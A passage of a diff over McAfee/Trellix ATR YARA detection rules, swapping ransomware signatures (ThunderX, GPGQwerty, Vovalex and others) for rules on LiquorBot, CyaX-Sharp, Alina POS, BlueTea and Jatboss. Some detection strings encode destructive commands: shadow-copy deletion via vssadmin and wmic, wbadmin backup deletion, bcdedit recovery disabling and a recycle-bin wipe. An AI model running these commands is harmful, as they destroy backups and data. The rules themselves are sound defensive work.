"\\Projects\\Rescator\\MmonNew\\Debug\\mmon.pdb" condition: - uint16(0)==0x5a4d and filesize <300KB and pe.number_of_sections==5 and (pe.imphash()=="30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ($code*))) + uint16(0)==0x5a4d and filesize <300KB and any of them } -import "pe" - -rule TRELLIX_ARC_Sodinokobi : RANSOMWARE +rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE { meta: - description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future." - author = "McAfee ATR team" - id = "dd05ce31-9699-50a9-944c-5883340791af" - date = "2024-09-01" - modified = "2020-08-14" + description = "Rule to detect LiquorBot malware" + author = "Marc Rivero | McAfee ATR Team" + id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5" + date = "2020-08-19" + modified = "2020-08-19" reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Sodinokibi.yar#L33-L54" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_liquorbot.yar#L1-L23" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2" + logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89" score = 75 quality = 70 - tags = "RANSOMWARE" - malware_type = "ransomware" - malware_family = "Ransom:W32/Sodinokibi" + tags = "MALWARE, FILE" + rule_version = "v1" + malware_type = "malware" + malware_family = "Botnet:W32/LiquorBot" actor_type = "Cybercrime" actor_group = "Unknown" - version = "1.0" + hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9" strings: - $a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF } - $b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA } + $pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF } condition: - all of them + uint16(0)==0x457f and all of them } -import "pe" - -rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE +rule TRELLIX_ARC_Cyaxsharp_Rezer0 : LOADER { meta: - description = "Rule to detect tthe ThunderX ransomware family" - author = "McAfee ATR team" - id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34" - date = "2020-09-14" - modified = "2020-10-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_ThunderX.yar#L3-L45" + description = "Detects CyaX-Sharp/ReZer0 loader samples based on the embedded scheduled task template" + author = "Max 'Libra' Kersten for McAfee's Advanced Threat Research Team" + id = "7a1addcf-4e8f-5290-8788-9b0738128160" + date = "2021-04-08" + modified = "2021-08-04" + reference = "This rule was published in combination with the following McAfee ATR blog: https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/see-ya-sharp-a-loaders-tale/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MAL_cyax_sharp_loader.yar#L1-L16" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece" + logic_hash = "3d6daaf7a85a9b3898e4ce5d5293b09f26965f9f7280b34ba8f6814b7f14dec2" score = 75 - quality = 68 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransomware:W32/ThunderX" - actor_type = "Cybercrime" - actor_group = "Unknown" - hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6" - hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666" - hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e" + quality = 70 + tags = "LOADER" + version = "1.0" + malware_type = "loader" strings: - $pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" - $s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii - $s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii - $s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii - $s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii - $s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii - $s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii - $s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii - $s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii - $s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii - $s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii - $s13 = "7B5041545445524E5F49447D" ascii - $s14 = "726561646D652E747874" ascii - $s15 = "226E6574776F726B223A22" ascii - $s16 = "227375626964223A22" ascii - $s17 = "226C616E67223A22" ascii - $s18 = "22657874223A22" ascii - $s19 = "69642E6B6579" ascii - $s20 = "7B5549447D" ascii - $seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc } - $seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 } - $seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 } + $template = { 01A10C3C3F786D6C2076657273696F6E3D22312E302220656E636F64696E673D225554462D3136223F3E0D0A3C5461736B2076657273696F6E3D22312E322220786D6C6E733D22687474703A2F2F736368656D61732E6D6963726F736F66742E636F6D2F77696E646F77732F323030342F30322F6D69742F7461736B223E0D0A20203C526567697374726174696F6E496E666F3E0D0A202020203C446174653E323031342D31302D32355431343A32373A34342E383932393032373C2F446174653E0D0A202020203C417574686F723E5B5553455249445D3C2F417574686F723E0D0A20203C2F526567697374726174696F6E496E666F3E0D0A20203C54726967676572733E0D0A202020203C4C6F676F6E547269676765723E0D0A2020202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A202020203C2F4C6F676F6E547269676765723E0D0A202020203C526567697374726174696F6E547269676765723E0D0A2020202020203C456E61626C65643E66616C73653C2F456E61626C65643E0D0A202020203C2F526567697374726174696F6E547269676765723E0D0A20203C2F54726967676572733E0D0A20203C5072696E636970616C733E0D0A202020203C5072696E636970616C2069643D22417574686F72223E0D0A2020202020203C5573657249643E5B5553455249445D3C2F5573657249643E0D0A2020202020203C4C6F676F6E547970653E496E746572616374697665546F6B656E3C2F4C6F676F6E547970653E0D0A2020202020203C52756E4C6576656C3E4C6561737450726976696C6567653C2F52756E4C6576656C3E0D0A202020203C2F5072696E636970616C3E0D0A20203C2F5072696E636970616C733E0D0A20203C53657474696E67733E0D0A202020203C4D756C7469706C65496E7374616E636573506F6C6963793E53746F704578697374696E673C2F4D756C7469706C65496E7374616E636573506F6C6963793E0D0A202020203C446973616C6C6F77537461727449664F6E4261747465726965733E66616C73653C2F446973616C6C6F77537461727449664F6E4261747465726965733E0D0A202020203C53746F704966476F696E674F6E4261747465726965733E747275653C2F53746F704966476F696E674F6E4261747465726965733E0D0A202020203C416C6C6F77486172645465726D696E6174653E66616C73653C2F416C6C6F77486172645465726D696E6174653E0D0A202020203C53746172745768656E417661696C61626C653E747275653C2F53746172745768656E417661696C61626C653E0D0A202020203C52756E4F6E6C7949664E6574776F726B417661696C61626C653E66616C73653C2F52756E4F6E6C7949664E6574776F726B417661696C61626C653E0D0A202020203C49646C6553657474696E67733E0D0A2020202020203C53746F704F6E49646C65456E643E747275653C2F53746F704F6E49646C65456E643E0D0A2020202020203C526573746172744F6E49646C653E66616C73653C2F526573746172744F6E49646C653E0D0A202020203C2F49646C6553657474696E67733E0D0A202020203C416C6C6F7753746172744F6E44656D616E643E747275653C2F416C6C6F7753746172744F6E44656D616E643E0D0A202020203C456E61626C65643E747275653C2F456E61626C65643E0D0A202020203C48696464656E3E66616C73653C2F48696464656E3E0D0A202020203C52756E4F6E6C79496649646C653E66616C73653C2F52756E4F6E6C79496649646C653E0D0A202020203C57616B65546F52756E3E66616C73653C2F57616B65546F52756E3E0D0A202020203C457865637574696F6E54696D654C696D69743E505430533C2F457865637574696F6E54696D654C696D69743E0D0A202020203C5072696F726974793E373C2F5072696F726974793E0D0A20203C2F53657474696E67733E0D0A20203C416374696F6E7320436F6E746578743D22417574686F72223E0D0A202020203C457865633E0D0A2020202020203C436F6D6D616E643E5B4C4F434154494F4E5D3C2F436F6D6D616E643E0D0A202020203C2F457865633E0D0A20203C2F416374696F6E733E0D0A3C2F5461736B3E } condition: - ( uint16(0)==0x5a4d and filesize <400KB and pe.imphash()=="ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ($seq*) or ( all of them ) + $template } -rule TRELLIX_ARC_Crime_Ransomware_Windows_Gpgqwerty : RANSOMWARE +rule TRELLIX_ARC_Alina_POS_PDB : POS FILE { meta: - description = "Detect GPGQwerty ransomware" - author = "McAfee Labs" - id = "dcbaf3bd-7d0c-5449-a751-82caaad3b5c2" - date = "2018-03-21" + description = "Rule to detect Alina POS" + author = "Marc Rivero | McAfee ATR Team" + id = "9588aa10-d5e4-55f4-998c-a01503a53d3a" + date = "2013-08-08" modified = "2020-08-14" - reference = "https://securingtomorrow.mcafee.com/mcafee-labs/ransomware-takes-open-source-path-encrypts-gnu-privacy-guard/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_GPGQwerty.yar#L1-L26" + reference = "https://www.pandasecurity.com/mediacenter/pandalabs/alina-pos-malware/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_alina_pos_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "8e77895cb8e7f33707c5080780a49cb4bf1d35aa7a8df829fdc7a93319ce3897" + hash = "28b0c52c0630c15adcc857d0957b3b8002a4aeda3c7ec40049014ce33c7f67c3" + logic_hash = "9bb8260e3a47567e2460dd474fb74e57987e3d79eb30cdbc2a45b88a16ba1ca2" score = 75 quality = 70 - tags = "RANSOMWARE" + tags = "POS, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/GPGQwerty" + malware_type = "pos" + malware_family = "Pos:W32/Alina" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $a = "gpg.exe –recipient qwerty -o" - $b = "%s%s.%d.qwerty" - $c = "del /Q /F /S %s$recycle.bin" - $d = "cryz1@protonmail.com" + $pdb = "\\Users\\dice\\Desktop\\SRC_adobe\\src\\grab\\Release\\Alina.pdb" condition: - all of them + uint16(0)==0x5a4d and filesize <100KB and any of them } -rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE +rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE { meta: - description = "Rule to detect Exorcist" - author = "McAfee ATR Team" - id = "38ab069d-b030-5459-a42f-7ecd5963e68f" - date = "2020-09-01" - modified = "2020-10-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Exorcist.yar#L1-L25" + description = "Rule to detect the RTF files created to distribute BlueTea trojan" + author = "Marc Rivero | McAfee ATR Team" + id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab" + date = "2020-04-21" + modified = "2020-08-14" + reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247" + hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277" + logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "MALDOC, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransomware:W32/Exorcist" - actor_type = "Cybercrime" - hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0" + malware_type = "maldoc" + malware_family = "Maldoc:W32/BlueTea" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF } - $sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 } + $sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? } condition: - uint16(0)==0x5a4d and any of them + uint16(0)==0x5c7b and filesize <100KB and all of them } -import "pe" - -rule TRELLIX_ARC_Ransom_Vovalex_Part2 : RANSOM FILE +rule TRELLIX_ARC_Jatboss : PHISHING FILE { meta: - description = "Vovalex ransomware detection part 2" - author = "CB @ ATR" - id = "26c91d06-13da-5039-8b8a-eb8de2774d79" - date = "2021-02-01" - modified = "2021-02-01" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Vovalex1.yar#L3-L42" + description = "Rule to detect PDF files from Jatboss campaign and MSG files that contained those attachents" + author = "Marc Rivero | McAfee ATR Team" + id = "009a7486-2ee8-57ef-8dfd-fcbd035b4e85" + date = "2019-12-04" + modified = "2020-08-14" + reference = "https://exchange.xforce.ibmcloud.com/collection/JATBOSS-Phishing-Kit-17c74b38860de5cb9fc727e6c0b6d5b5" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/malware/MALW_jatboss.yar#L1-L36" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "82814fd9155ec910c6353de8336733704e05c9f02409ad99cd80da8ef9fe3c04" + hash = "b81fb37dc48812f6ad61984ecf2a8dbbfe581120257cb4becad5375a12e755bb" + logic_hash = "5e6e4c8f6c0896623f166a98eb83a9a4f23139306671cf2e35ba239b2dc191fc" score = 75 - quality = 64 - tags = "RANSOM, FILE" - malware_type = "Ransom" - malware_family = "Ransom:Win/Vovalex" - hash1 = "0604acc15196120db2f4ca922feb2a4c858a46123cb26e9af2ef97b4c7839121" - hash2 = "fe9ff27ec0a1a48cbb8bc043f260a656c221c6c61704187a390bc8da6f91103a" - hash3 = "3b198c367aca1d239abc48bdeb8caabf9b8f2b630071b8e0fd1e86940eab14d6" + quality = 66 + tags = "PHISHING, FILE" + rule_version = "v1" + malware_type = "phishing" + malware_family = "Phishing:W32/Jatboss" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $x1 = "If you don't know where to buy Monero - visit these websites: https://www.bestchange.ru/ https://www.bestchange.com" fullword ascii - $s2 = "Full list: https://www.getmonero.org/community/merchants/#exchanges" fullword ascii - $s3 = ": https://www.getmonero.org/community/merchants/#exchanges" fullword ascii - $s4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" fullword ascii - $s5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" fullword ascii - $s6 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" fullword ascii - $s7 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" fullword ascii - $s8 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\random.d" fullword ascii - $s9 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\conv.d" fullword ascii - $s10 = "3. If everything is good, you will receive the decryptor." fullword ascii - $s11 = "Attempting to flush() in an unopened file" fullword ascii - $s12 = "Monero: 4B45W7V1sJAZBnPSnvcipa5k7BRyC4w8GCTfQCUL2XRx5CFzG3iJtEk2kqEvFbF7FagEafRYFfQ6FJnZmep5TsnrSfxpMkS" fullword ascii - $s13 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\padding.d" fullword ascii - $s14 = "crypto.aes.AES!(4u, 8u, 14u).AES" fullword ascii - $s15 = "..\\AppData\\Local\\dub\\packages\\crypto-0.2.16\\crypto\\src\\crypto\\aes.d" fullword ascii - $s16 = "Monero - " fullword ascii - $s17 = "std.random.uniform(): invalid bounding interval " fullword ascii - $s18 = 